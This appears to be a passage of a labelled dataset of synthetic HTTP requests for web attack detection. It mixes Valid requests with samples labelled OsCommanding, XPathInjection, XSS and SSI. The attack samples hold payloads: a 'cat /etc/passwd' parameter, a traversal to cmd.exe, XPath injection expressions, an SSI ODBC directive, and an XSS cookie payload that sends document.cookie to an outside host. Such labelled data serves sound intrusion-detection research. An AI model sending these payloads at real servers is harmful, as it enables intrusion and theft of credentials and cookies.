If-Unmodified-Since: Wed, 16 Jan 08 10:21:09 CET
If-Match: "PnJK9WdodETi-DcW1"
If-None-Match: "0aES7pahaU78Jh-uTos"
If-Range: *
Max-Forwards: 0
MIME-Version: 6.5
Pragma: s2jdr=c4erk0oe
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: NTLM dEVOZW5zbml0Zk1vdW11NWhlZW5maGVsZnE5dGh0c2k=
Range: 5753-
Referer: http://www.yib1.de/meia/frcu/tr56nej/ite1rrsa/ronAad.pdf
TE: trailers
Trailer: Accept-Charset
User-Agent: thhzOH9HDd http://www.r4htnn.st
UA-CPU: StrongARM
UA-Disp: 7032,830,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 840x5182
Via: 1.2 www.Dthhe.js:86, 5.0 104.77.149.218
Transfer-Encoding: Ttgdt; 4gs0Ootv=eozdiEi
Upgrade: tth/7.2, dia/5.2, 17ohEa/5.1, dn2/4.0, lsaabo/1.1
Warning: 256 www.fsdPc.htm "rHeIzlrwN64st" "Sun, 11 Jul 04 05:24:39 CET"
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 0666131259
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 551
Start - Id: 43115
class: OsCommanding
GET /d30ge2UYoKgJTd.zZ4DV/tU0uWfvf/mn1yPeaQymrEnamcee/taweo.jpeg?aNoNqHrE2lf=oilfaze7nftrRhm&nerl5eAiVV=32&NDhBZtwindow.open4tmp=n%24%5Di&DGQFftpplocationhomeCf=233499&kyaeaf7pIei=tsnfVQ&sll=813&bNraomuqenDt=rmIKd&mwwvts2ebos=tmp&onektaet=h%3DUeagEn&h483ONno=h%3Cfoa&to5detr2rthuf=Ngcldn&rcm3l0Mlha=cat++++%2Fetc%2Fpasswd%7C&evalN6nB=rvlZssv2q9k HTTP/1.1
Host: www.rvtanjpnn.org:5
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr;q=0.3
Accept-Encoding: gzip, deflate;q=0.0, deflate;q=0.2
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 107.157.218.192
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Sat, 21 Oct 06 20:02:32 UTC
ETag: "WV@RnoNoblIi_WrxHi"
Expect: 100-continue
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Tue, 09 Oct 07 10:02:17 CET
If-Unmodified-Since: Tue, 08 Jul 08 20:51:15 GMT
If-Match: *
If-None-Match: *
If-Range: "0TpZeFNLd1lmCS8-6wEC"
Max-Forwards: 4537
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: ebLw xtl4r=t6xue5
Range: 94856-,22-022
Referer: http://929ln.net/Tlr5Dsoe/rkrrseh/teT32v/elweItde.aspx
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: Mozilla/2.3 (compatible; wgrIhhc; Open BSD i586; oyea; bdOAAe; btpToS)
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 5.8 www.ndqgd.css, Teg/7.3 63.251.131.119
Transfer-Encoding: gzip
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43115
Start - Id: 49659
class: XPathInjection
GET /dRpSnZeSL.h8fQBviXi/ml1tna/qsSdoonseorgirzaow/lxZ9lbPyoRlRg/cNxkzDpMKTD8y9t.cgi?hrRdnaarqqsps=939&re4NbUyfgsm2wnw=nbOF9b4an%40PT&lniEeweep=ihsa7oclzrel6t0EO&onztemnwfAehuia=st9uaTreDlaB7u&bgsoundM_a=%3Fs9si+inoztTnn&htn4=ukiyue&xNotfcrb=ebgsound&l@HykLmetauF8=8&toeo=n0YtbAlr%40&a799T.rcph3=8&4ukz5gmAnle=%28i++%3C+++count%28s6ee%2Fchild%3A%3Atext%28%29%29++++and++++j+++%3C+++++count%28xygeb%2Fchild%3A%3Acomment%28%29%29+++++and++k++%3C++count%28al%2Fchild%3A%3A*%29++%29 HTTP/1.0
Host: www.itwd.fr
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.5
Accept-Language: *;q=0.0
Cache-Control: min-fresh=703
Client-ip: 248.26.123.88
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Mon, 01 Jun 09 18:39:32 GMT
ETag: W/"tMSsJ3bLqozrYkMJ"
Expect: httd
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Mon, 26 Apr 10 22:01:40 GMT
If-Match: "ztLNDQteWb3GoLPJuof"
If-None-Match: *
If-Range: "UR2K2DBnbkqhR.d@B"
Max-Forwards: 1119
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 7083-858216,-723,8872-
Referer: /sewe/Yecru.asp
TE: trailers,gzip;q=0.6
Trailer: Date
User-Agent: artliktdwngj
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
Via: 5.4 129.10.237.16
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 369 www.8nrabs.html "Ssfefi" "Wed, 10 Oct 07 11:26:24 CET"
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49659
Start - Id: 44257
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ahtekepil.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: eb3nsclt-uen;q=0.5
Cache-Control: only-if-cached
Client-ip: 252.49.218.208
Cookie: CHb@5TT=?Ajtmp;yfe=~;dre9msfyheht=access_loghttpHaefadunionntqdh
Cookie2: $Version="045"
Date: Tue, 18 May 04 17:42:24 GMT
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Mon, 02 Apr 07 08:45:47 UTC
If-Unmodified-Since: Tue, 19 Feb 08 04:29:35 CET
If-Match: *
If-None-Match: *
If-Range: "G.xNTEgrjaUXUdJD"
Max-Forwards: 5072
MIME-Version: 3.0
Pragma: eyfphnui='sonoce'
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: /ahct/ies9/gdOripde/eniruy/lmtie.asmx
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 9.1; ow-rr; rv:8.2.0) Gecko/08972789
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2658x747
Via: HTTP/8.7 www.deton4hs.png, FTP/3.4 www.saihttn.gif, 8.7 66.170.149.102
Transfer-Encoding: 4ionne; do8tncuc=nico
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44257
Start - Id: 49030
class: XPathInjection
GET /sdnVhJ8tZ1gm/Tsjq6Ahe3FNn3vtoByte/jzh9oq8mw/et/r@TphAZkUOqT2/2sWhQP.b9bBRspWLi/wte.jpeg?ngxc5a=3&AdAawU=idhan&Pkh=560+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+7686%3D&zaim=iframee&Diksocmidhrae=641 HTTP/1.0
Host: www.aysesaeorr.fr
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-2022-jp;q=0.8, windows-1251;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=3230
Client-ip: 172.221.103.89
Cookie: 8rkqt2R=sY6cDHCpC;imgJVI=heo;hrs=6zkXHi1;ndheo=h;bevalc;tiw;EmsAaealr=ad&o
Cookie2: $Version="88"
Date: Thu, 27 Nov 08 09:40:18 UTC
ETag: "n69p-tk6OwCMUhRX"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sat, 09 Aug 08 17:50:32 UTC
If-Unmodified-Since: Fri, 16 Jul 04 18:54:37 CET
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: "t.iXnOfXYkF6FYq"
If-Range: *
Max-Forwards: 34
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic Z2ljb2NzOm5mZWVhbg==
Range: -31
Referer: /qFeaeBt.tar.gz
TE: deflate;q=0.7,gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 7.7; ut-Oh; rv:9.8.0) Gecko/14241364
UA-CPU: 68000
UA-Disp: 913,4010,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: rphl/5.9 246.138.1.26
Transfer-Encoding: compress
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49030
Start - Id: 23885
class: Valid
GET /e0hopenlCobwinntz/mAw-Bf.bin?orHutufrmeotMq7=bi6%3Ftx&heaPTmlahualmp1=ithcie%26&yntfsue2rybdsor=o4eHssad&dc=73406117&w3Qwq@=ihh&child9_vadp=eoOwfeZcqQL&nhrtrYret7lg=81&gRd=iks&2documentv0m.qFwxPn=nvuuhVTO.&U1loflnFeohGe=181&XW2THhaving9=79668693&sennE5i3mad6=boarat4resbs&s1usN8rpai=e0.1v3MS.Pml&Nibkeruhcuc6eI=2&teZMaUjhtaccesdeleteAall3=xmhrH HTTP/1.0
Host: www.hnee.ch
Connection: close
Accept: text/xml, text/*, image/gif;q=0.0
Accept-Charset: cp-950, x-mac-hebrew;q=0.6, x-mac-roman;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=3672
Client-ip: 36.165.156.12
Cookie: mCkcdhsohweus7e=hetenouk
Cookie2: $Version="487"
Date: Mon, 24 Aug 09 06:08:17 GMT
ETag: "NA39_MiEzIy7aaTXh"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Thu, 04 Jun 09 15:26:10 GMT
If-Unmodified-Since: Sat, 03 Feb 07 06:19:47 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Jan 10 06:15:13 UTC
Max-Forwards: 5770
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest username="8tmsi"
Range: 03-350626
Referer: http://iles.it/bxidMat/rudoptrh/aucpzeIo.exe
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: seradt
UA-CPU: 68000
UA-Disp: 734,1255,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 470x399
Via: 4.7 www.Eebcsr.png
Transfer-Encoding: identity
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 698 www.t56eEr.tiff "oga2fenttnIsnrh" "Sun, 30 Oct 05 14:52:54 GMT"
X-Forwarded-For: 87.73.118.107
X-Serial-Number: 32892404874
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23885
Start - Id: 18460
class: Valid
GET /i4TepDaeNs9elorqtt/rhnezi9ede/rSKxO9i1ruDf61IzB5d/iu/T5ws1riosohmiute/on@sMJzl4wNMA64/yhEMvxehPKl-6lE7/risK1k5ye8Q9pciTtaWJ/dIDJx..sh?wwxrsrtgo=56154023&hqp=ecmsrrll3olleoeadf&vElirnee0rea=Gnere&emeias6qtnmtr6u=50 HTTP/1.1
Host: www.nAzoqe1l.gov:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-icelandic, euc-jp;q=0.2, x-mac-greek
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-age=89252
Client-ip: 223.195.59.109
Cookie: mnornyoayndt8=scTE6;ahcea2ui7a=462;5srk9yuett=A3;6hjYoOhki8r=shutdowninrfea'or(mlds;_.PPow=b_Pn5qQsOE;dttNt=3803
Cookie2: $Version="4"
Date: Sun, 12 Mar 06 06:23:16 GMT
ETag: W/"xrVeM_DsdLGIeOWkDNiQ"
Expect: 100-continue
From: stiq@titznIesy.de
If-Modified-Since: Sun, 27 Jun 04 07:11:29 CET
If-Unmodified-Since: Thu, 04 Feb 10 17:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: "rvqFv15fdwTbnUGdz"
Max-Forwards: 8723
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: Digest realm
Range: 4-11,-84925,438-
Referer: http://www.pljtl.uk/AhRl2e/amEais/utse.doc
TE: trailers
Trailer: Via
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 5.4; wm-o8; rv:0.9.8) Gecko/81186847
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: g0eN/9.3 224.175.144.214
Transfer-Encoding: gre0
Upgrade: emlqe/4.7, 0ijpy/5.5, 2ee/6.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 25635510975973984373
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18460
Start - Id: 23355
class: Valid
GET /uvRatnie/lW2pd@kvckT/tgLdiib8hphlKzni/hjh9miRNLmH34XQN/ofA0uTUE5/d36ssjakhflhih81f.jpeg? HTTP/1.1
Host: www.t0Inew.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-tw;q=0.9
Accept-Encoding: 
Accept-Language: iiei-2kr18, ntnxa-tStrEt;q=0.0, nvUe-b, wiateete-5bhn
Cache-Control: nqnar=lt6tt
Client-ip: 253.173.161.120
Cookie: lcwc=ynygtE in;orhezoturgr=tmB;eeAsctbw=357845;VbodtpeeCgt=i8gwbayux;rece9lwa=soae
Cookie2: $Version="5"
Date: Fri, 10 Jun 05 16:22:59 CET
ETag: W/"VJMG@zC_AoJVokypG4y"
Expect: 100-continue
From: on7na@eoumlrnhbp.com
If-Modified-Since: Sat, 20 Jan 07 04:22:17 GMT
If-Unmodified-Since: Thu, 29 Nov 07 20:57:44 GMT
If-Match: "O6yteQ5c5WoJZxV38u"
If-None-Match: *
If-Range: "5E2Ina683mOTSusJk90y"
Max-Forwards: 35
MIME-Version: 7.3
Pragma: jVafcnn=0
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: tely Nkxo8iE=7tmeoIkc
Range: -34442
Referer: /opeua/lOfg/dil0e/ovnnba/susjnny.pdf
TE: trailers,gzip;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 1.4; us-ca; rv:1.4.9) Gecko/37864907
UA-CPU: StrongARM
UA-Disp: 611,430,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 026x806
Via: 3.9 250.13.205.204, 8.9 www.potseatn.png:67991, oreIb/4.9 84.154.112.73
Transfer-Encoding: gzip
Upgrade: rseahb/4.1
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23355
Start - Id: 46747
class: XSS
GET /F7X/t_u9AZmxIKclM9/unionJdocument8@GflTing/xoQ/ad_p-qY1FftprjI/tfJ/oyysHoxlaoeeao7drid/oGT0FfO/pL1AV4sGq48TPyZUab/ej12ehsf.nsf? HTTP/1.0
Host: 56.24.154.239
Connection: gota
Accept: text/html, audio/basic, image/*
Accept-Charset: us-ascii;q=0.5, x-mac-roman;q=0.1, windows-1254, windows-1257
Accept-Encoding: 
Accept-Language: Te-l6, giiaEi-rMY, y-whtco;q=0.4, eR-wgo73qn;q=0.6
Cache-Control: no-transform
Cookie: seaDe=<div  style  = "   background-image:     url(javascript:  [document.location.replace ('http://www.reri.com/cgi-bin/narachni.cgi'+document.cookie);]);   "   >;eeltoecxR=a9fa
Cookie2: $Version="2"
Date: Sat, 15 May 04 17:20:47 GMT
ETag: "J.TJLmAEqK6XqFn6"
Expect: 100-continue
From: Nbtsa@emewereOk.com
If-Modified-Since: Sat, 17 Mar 07 09:15:05 GMT
If-Unmodified-Since: Sat, 13 Nov 04 22:30:47 CET
If-Match: "FB0w4JLNzi8yt_daz"
If-None-Match: *
If-Range: Sun, 10 Feb 08 16:20:26 CET
Max-Forwards: 91
MIME-Version: 9.8
Pragma: no-cache
Authorization: NTLM c2JlM2dTZW51eWVvb2Fybm9uaHNoaFpodXBhYVFlbmNzZXNlYm5uZWUy
Referer: /0ztxe/ewmpze.php3
Trailer: Date
User-Agent: diiofa
UA-Disp: 8606,8749,32
UA-OS: Win98
Upgrade: wur/0.7
Warning: 427 www.hawmt.shtml:15983 "urlr86bNwi6airoy" "Thu, 09 Apr 09 13:19:54 CET"
X-Serial-Number: 6732905562
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46747
Start - Id: 23752
class: Valid
GET /Paetc5.delete/mrqTP@DMp4oUSf/il/HAh5BIEJ6/PUyy1Posx72yS/hNSyTW-g4/2SucwUqjjz/eYeOUZoU8_z/chnran4uctse88.asp?dh6s5=b2z&ylin=eohgqtHt&AnodScttseyodNk=708807&uiniw=a8ed&fht8Le3ladok=h7iE&jg48Fyz=2ApAnemailmailisy&1wnen3a0qat=nenupdatee+o-Ern&VHGRiNsEi6_=7NfK-3YS2G1&CUQo@U1xd=iaegi0a&PqjxD0oiupdateg=dh+%3DdnT&naaoapcDmsedin=qIt%3AwPsascript&a1nLtib=eler7T HTTP/1.0
Host: 171.85.27.246
Connection: close
Accept: video/*, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=291
Client-ip: 162.99.120.131
Cookie: scateihm=dof ere;ea2ooisner= i;eronff=h6;ZnZNJCbc=bL7wy8BEanW;t9ntotifahbneo=s81ykG3.BN3k
Cookie2: $Version="93"
Date: Mon, 09 Apr 07 07:42:47 UTC
ETag: "uhuVGtTX8ksUIS7R3"
Expect: tteedng=e8dtDpe
From: tddnc@aNensle3pe.org
If-Modified-Since: Sun, 15 Jun 08 12:37:12 UTC
If-Unmodified-Since: Sun, 28 Oct 07 11:09:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 59
MIME-Version: 5.6
Pragma: 34='ramIee'
Proxy-Authorization: Digest nonce
Authorization: Outohh dtZusi=Sqtqvm
Range: 20-,-643631
Referer: http://www.eicdEn.be/yaedsi/owshAoi/jeponsT.cfm
TE: gzip;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/4.1 (X11; U; Linux i386 9.6; tw-re; rv:1.4.9) Gecko/06527432
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 431x276
Via: 1hreF/8.0 www.Cfo1stn.html, 7.1 www.wmss.htm, FTP/0.1 www.mr8sc.png
Transfer-Encoding: gzip
Upgrade: gal/4.2, ein/9.9, lhi/2.6, Iarfn/4.7
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23752
Start - Id: 19678
class: Valid
GET /Haeildsstndariec/efJXzfjj/hbD47GWRx/hv0tO1y7Wm/DbcUdJBX.mdb?rsoooyoxB=1637729608&o3le3rzshjirl=hpm&Arevz1TRjp=pYp5xxJZs%40z&ZdyZxK=tme&unek6wrsl8eeuta=helaUi03j&obs6os=ucotiopE HTTP/1.0
Host: www.odney.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate, deflate;q=0.8
Accept-Language: fhus-yszyii;q=0.6, 95ryY-haex;q=0.4
Cache-Control: max-age=24023
Client-ip: 154.154.253.122
Cookie: aoos=504;pwczlizapg=616;rlelhRlelto=pi;Pr=01509;af=hYetu;vobjectb2xGmG=8
Cookie2: $Version="9"
Date: Wed, 25 Feb 09 15:25:53 CET
ETag: W/"pqdYt_MoISF.Gex"
Expect: 100-continue
From: cdsh@haensoen.de
If-Modified-Since: Fri, 10 Jun 05 04:34:16 CET
If-Unmodified-Since: Fri, 27 Aug 04 12:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Nov 05 08:07:22 UTC
Max-Forwards: 168
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: Digest algorithm=vseie
Range: 921246-43
Referer: http://rydiB.st/lvzeoe3/aididaib/waiide4n.aspx
TE: deflate,gzip;q=0.7
Trailer: Host
User-Agent: iielooa6y
UA-CPU: MIPS
UA-Disp: 4810,493,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 106x833
Via: ltYz/4.8 www.ekjlatr.css, HTTP/5.0 85.166.133.129, FTP/5.7 www.rtpom.js:6134
Transfer-Encoding: deflate
Upgrade: oalaa/7.0, rhnhe/1.6, nkog/3.3
Warning: 503 www.hesa5ol.html:9360 "rpo78l" "Thu, 30 Jun 05 14:07:38 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19678
Start - Id: 22400
class: Valid
GET /u.Cu-G/eP8cuM1/whkp.js?desehetvlpaee=idarh%7CosU&aosree5u=e7OTBNy&thizW3ma1=re&_4R-AqwconnectA=a&hkj=7%3As&tftrTPlhit=96996&ZwR-y=otDyc&uTk=22062863&ciiaaeito=64772&comr9duhast=fwv&n5Egsshsohei3l=enggtsvVEuHQ HTTP/1.1
Host: www.cstaOeeppr.net
Connection: snoi
Accept: image/gif;q=0.1
Accept-Charset: iso-8859-3;q=0.1, utf-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 66.40.83.188
Cookie: nnuidou15ste=sw;l5=e 14and@xo~e;patett=e4WidImpSW
Cookie2: $Version="9"
Date: Wed, 26 Sep 07 20:04:52 CET
ETag: "YYFg_yu6KSP23m7mP"
Expect: 100-continue
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Fri, 31 Aug 07 12:10:12 UTC
If-Unmodified-Since: Wed, 02 May 07 24:03:52 CET
If-Match: *
If-None-Match: "RdRzRdw2WH61vQi"
If-Range: "J6E9V18BcvSkvLDt3kl"
Max-Forwards: 638
MIME-Version: 0.8
Pragma: r1d=a
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: Basic ZXRoZWRzOmhFOWFvbmk=
Range: 272882-6
Referer: /hNer/nrdae.mdb
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/5.1 (Machintosh; U; PPC Mac OS X 3.6; 4h-im; rv:1.7.9) Gecko/80567194
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: iasaue/5.7 www.rnee.jpeg, FTP/6.4 www.Rwsa0sl.jpg
Transfer-Encoding: identity
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 277 www.e1sshZ.js "imastqftsdu" 
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22400
Start - Id: 20305
class: Valid
GET /dictrg/eoThe/1BFe-Yc-1BIJU-6P1h/re/rp32JbvqmUbknteX2y/netcatWlocationvLr0-_-Udivy-/h7ppynna6/wn_3atFJWHT5S2j.tiff?iarhnoYw=aYnz_&ljdtteen9tadagO=0SfOp87xYgie&ahhcbea=essm&tlsrceneizo=9eEgnuE&atboeiparUu2as=u89O0&aomTI1itTEe2lc=4&o79wtltsar=5360762731&Oiearsvoo=15&P2passwdChOPko=14823&tiR1ta=gthti&vAt8=xEzw+o+processing-instructionsipassthruycd&5oatrrad2egocrc=d0H%7C&HIr0Y9y=34&LnNhRttrgnsAp5=4&oTkyacF=%25h HTTP/1.0
Host: 183.8.189.11
Connection: 4OSeeeb
Accept: application/zip;q=0.9, video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.9, gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: l0eobt='g'
Client-ip: 235.128.217.246
Cookie: n2eattteLce=ra;jeiaas=334
Cookie2: $Version="6"
Date: Sun, 02 Jul 06 07:56:14 CET
ETag: ".K4uxiMGwo34VLinBM"
Expect: 100-continue
From: ss7chat@0nncgbi.fr
If-Modified-Since: Fri, 04 Aug 06 10:14:58 GMT
If-Unmodified-Since: Thu, 04 Jan 07 06:38:15 GMT
If-Match: "Fvw6_.wgmUx2x07og"
If-None-Match: *
If-Range: "j1ziL5EdvDwEjr1A2a"
Max-Forwards: 8763
MIME-Version: 1.1
Pragma: arwIr=r47mtsta
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: NTLM ZHBkeWJ0MW5uZDFuem9HMnlsTG9hdXR0dWVsb2ZPdHRsdA==
Range: -755,8352-
Referer: /sengti/Getdd.doc
TE: trailers
Trailer: Transfer-Encoding
User-Agent: mBpXHo. http://www.VnasE.biz
UA-CPU: PowerPC
UA-Disp: 2037,1915,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 608x215
Via: 1.0 136.209.218.237
Transfer-Encoding: deflate
Upgrade: tsen/7.5, oodl/0.1
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20305
Start - Id: 40770
class: SSI
PUT /o@W/nkkETxMviZIw_Z/xtkt6a/esU@TMZNhttpsftprU/hEAddhohitee/6uaQoVSC@-TK/le2la49thc15eno8g/eNeilueIatiiuansdf/houhh7vooet.exe? HTTP/1.1
Content-Length: 123
Content-Language: pmoaerd,6va
Content-Encoding: gzip
Content-Location: http://nOt0q.ch/erncf.exe
Content-MD5: Z2xhcG83cW1zRmxnb2wwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Aug 08 11:56:46 UTC
Last-Modified: Thu, 26 Aug 04 16:34:41 GMT
Host: www.kTOthP.fr
Connection: artih
Accept: image/jpeg, text/html, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.2, gzip, identity;q=0.3, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 166.41.33.129
Cookie: EL3=f7bDv7oA
Cookie2: $Version="1"
Date: Fri, 08 Oct 04 16:51:32 CET
ETag: "nl3cCS-91kvJ.@5g"
Expect: neiat
From: DbshI@eusrtwIFth.ch
If-Modified-Since: Sun, 23 Oct 05 14:18:50 CET
If-Unmodified-Since: Mon, 21 Aug 06 11:17:19 UTC
If-Match: "aDYOLld0vd71u9yp6"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: *
Max-Forwards: 493
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic ZW55bmVJbzpsdWxubXk=
Authorization: hpbs rtdmeDr=0oOs
Range: 07-9,0-,-333
Referer: /syNrno/nrdedr/yeoax.wmn
TE: trailers,chunked,deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/2.5 (compatible; MSIE 3.1; WinNT; qorbofl; eete0ee4tE; tsrt)
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 9aAnsp/2.7 www.etaatnw.jpg, HTTP/0.0 152.243.230.174, 5.2 www.pamslzs.jpg:0
Transfer-Encoding: gzip
Upgrade: rhe/3.3
Warning: 179 48.43.62.132 "AathteacidznD9syc" 
X-Forwarded-For: 31.100.82.188
X-Serial-Number: 844488113887015051
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tdse9du6=<!--    #odbc     connect="d0WexOe,n29Ua,nsooe"         statement="select * from  en4s"-->

End - Id: 40770
Start - Id: 14475
class: Valid
